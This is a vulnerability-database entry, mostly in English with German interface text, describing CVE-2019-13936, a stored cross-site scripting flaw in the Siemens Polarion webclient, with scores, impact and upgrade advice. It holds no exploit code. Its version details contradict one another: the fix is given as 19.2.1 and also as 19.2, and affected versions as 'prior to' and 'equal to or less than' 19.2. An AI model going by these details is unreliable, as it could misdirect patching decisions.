Plattform
other
Komponente
polarion
Behoben in
19.2.1
CVE-2019-13936 describes a Cross-Site Scripting (XSS) vulnerability within the webclient component of Siemens AG Polarion. This vulnerability allows an attacker to inject malicious scripts, potentially leading to unauthorized access and data compromise. The issue impacts all versions of Polarion prior to 19.2, and a patch is available in version 19.2.
Successful exploitation of CVE-2019-13936 allows an attacker to execute arbitrary JavaScript code within the context of a user's browser session on the Polarion webclient. This can lead to a variety of malicious actions, including stealing sensitive user data (credentials, project information), hijacking user sessions, and defacing the web application. The attack surface is broad, as any user interacting with the vulnerable webclient is potentially at risk. The persistent nature of the XSS means the vulnerability can persist even after the initial attack vector is removed, potentially affecting multiple users over time.
CVE-2019-13936 was publicly disclosed on November 27, 2019. There is no indication of active exploitation campaigns targeting this vulnerability. No public proof-of-concept (PoC) code has been widely released, but the nature of XSS vulnerabilities makes it likely that such code could be developed and shared. The CVSS score of 3.5 (LOW) suggests a relatively low probability of exploitation in the absence of a readily available PoC.
Organizations utilizing Siemens Polarion for project lifecycle management, particularly those running versions prior to 19.2, are at risk. This includes teams relying on Polarion for requirements management, test management, and agile project tracking. Environments with shared user accounts or limited access controls may be more vulnerable.
disclosure
Exploit-Status
EPSS
0.34% (57% Perzentil)
CVSS-Vektor
The primary mitigation for CVE-2019-13936 is to upgrade to Polarion version 19.2 or later, which contains the fix. If upgrading immediately is not feasible, consider implementing input validation and output encoding on the webclient to sanitize user-supplied data. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly review and update Polarion's security configuration to minimize the attack surface.
Aktualisieren Sie Siemens AG Polarion auf Version 19.2 oder höher. Dieses Update behebt eine persistente Cross-Site Scripting (XSS)-Schwachstelle, die von einem Angreifer ausgenutzt werden könnte.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2019-13936 is a Cross-Site Scripting (XSS) vulnerability in the webclient of Siemens Polarion, allowing attackers to inject malicious scripts.
Yes, if you are using Siemens Polarion versions equal to or less than 19.2, you are affected by this XSS vulnerability.
Upgrade to Siemens Polarion version 19.2 or later to remediate the vulnerability. Consider input validation and WAF rules as interim measures.
There is no confirmed evidence of active exploitation campaigns targeting CVE-2019-13936 at this time.
Refer to the Siemens Security Notice: https://us-cert.cisa.gov/ics/advisories/SN-19-312
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.